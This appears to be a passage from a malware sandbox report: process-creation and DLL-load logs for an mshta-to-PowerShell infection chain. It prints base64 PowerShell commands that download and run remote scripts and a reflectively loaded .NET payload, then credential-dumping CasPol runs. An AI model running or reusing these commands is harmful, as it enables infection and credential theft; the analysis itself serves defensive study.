AgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\entiretimeneedgoodthingsforgetbackbestthingswithgoodnew.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6126.tmp" "c:\Users\user\AppData\Local\Temp\brz1t20s\CSCB0966C08AE0149D5A4EAEA26C81DD572.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnasterJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\vgphuoqzklppcrzcpcvdcumi"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\giuruybtythumfngynhenhzrnto"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\iczknrmumbzhpljkqyugqmuiwagwoan"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
